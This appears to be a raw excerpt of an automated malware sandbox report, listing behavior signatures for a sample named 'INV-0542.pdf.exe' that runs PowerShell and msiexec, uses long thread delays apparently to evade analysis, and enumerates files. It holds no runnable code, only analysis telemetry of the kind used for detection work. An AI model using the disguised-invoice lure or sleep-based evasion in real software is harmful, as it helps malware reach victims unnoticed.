Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8220			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1435			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1532	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2680	Thread sleep count: 1426 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2680	Thread sleep count: 8384 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3452	Thread sleep time: -593985s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C4D
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Code function: 0_2_00402930 FindFirstFileW,	0_2_00402930
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Code function: 0_2_0040689E FindFirstFileW,FindClose,	0_2_0040689E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
